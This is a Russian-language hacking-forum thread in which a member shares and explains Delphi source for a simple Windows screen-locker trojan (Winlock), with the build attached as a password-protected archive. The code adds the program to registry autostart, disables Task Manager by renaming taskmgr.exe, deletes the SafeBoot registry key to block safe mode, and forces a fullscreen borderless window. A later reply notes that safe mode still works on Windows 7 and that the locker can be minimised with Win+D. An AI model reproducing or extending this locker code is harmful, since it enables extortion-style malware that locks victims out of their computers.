• Уменьшение отступа

    Обратная связь

    (info@ru-sfera.pw)

Простенький Trojan.Winlock на делфи


X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 068
Репутация
8 176
Сейчас доделываю, зделал возможность отключения F8, доделываю сам блокер, извините что так долго, но сделфи давно не общался, ждите !Отдыхай!!!
 

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
Мне что то тут не нравится обращение какое то, или ошибаюсь, Обращение к TForm1=class(TForm) и последнее значение var
Тут нормально всё.Этот всё автоматически появляется при создании Form.Это стандартное начало.
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 068
Репутация
8 176
Блин простецкая прога, но провозился, у меня там ещё и сам делфи глючил, потом понял, что доктор вообще ничего не даёт сделать (На хрюши, тоже доктор стоял), за исходник взял уже написанный небольшой блокер и переделал его:

В общем смысл такой, при запуске программы, запускаются ещё три процедуры, для это в FormCreate, прописываем три процедуры:
Код:
  StartUp;
  Taskmgr(False);
  SafeBoot(False);

StartUp - Это основная процедура, там мы запишем наш блокер в автозагрузку, ну и автор предыдущего блокера копировал файл в Windows и запускал от туда, но т.к. у меня что-то всё заглючело благодаря доктору, я переделал просто добавление в автозагрузку из папки, где находится программа, добавив такие строки:
Код:
Reg:=TRegistry.Create;
  Reg.RootKey:=HKEY_CURRENT_USER;
  Reg.OpenKey('Software',True);
  Reg.OpenKey('Microsoft',True);
  Reg.OpenKey('Windows',True);
  Reg.OpenKey('CurrentVersion',True);
  Reg.OpenKey('Run',True);
  Reg.WriteString('MySoft','"'+Application.Exename+'"')
Где MySoft - это имя автозагрузки.

Taskmgr(False); - Это отключение диспетчера задач,путём переименования файла taskmgr.exe.

SafeBoot(False) - Это как раз функция отключения безопасного режима путём удаления веток в реестре, отключает F8 !

Остановлюсь о ней по подробней, в целом всё просто:

Код:
procedure SafeBoot(SafeBoot: Boolean);
begin
  Reg := TRegistry.Create;
  Reg.RootKey := HKEY_LOCAL_MACHINE;
  if SafeBoot = False then
  begin
  Reg.lazywrite := false;
  Reg.DeleteKey('HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot');
  end
  else
  begin
	Reg.MoveKey('System\CurrentControlSet\Control\SafeBoot\M',
	  'System\CurrentControlSet\Control\SafeBoot\minimal', true);
	Reg.MoveKey('System\CurrentControlSet\Control\SafeBoot\N',
	  'System\CurrentControlSet\Control\SafeBoot\NetWork', true);
  end;
  Reg.CloseKey;
  Reg.Free;
end;

Если False, то удаляем ветку HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot, если труе, то восстанавливаем всё как было !

Функции получились булевые, т.к. в данном случае реализовано ещё и удаление блокера ! ;)

Ну и не забывайте про полноэкранный режим:
Код:
form1.align:=alClient;
form1.borderstyle:=bsNone;

В общем пока всё, получилось немного коряво, зато вроде работает !Отдыхай!!!

Пароль:111
 

Вложения

  • Блокиратор Windows_New.zip
    2.1 МБ · Просмотры: 13

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 068
Репутация
8 176
Очень даже тот,теперь и исходники можно увидеть:)Кстати твоя программка DeDe-шустрая зараза.Простенькие дельфийские экзешники вмиг расковыривает.
Я уже перезалил, Project1.exe нужно запускать ! ;)
 

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
Я уже перезалил, Project1.exe нужно запускать ! ;)
Да я понял))Безопасный режим на семёрке работает,даже если запускать из-под администратора.Локер можно свернуть комбинацией клавиш Win+D (затем просто закрыть и удалить).
 
Верх Низ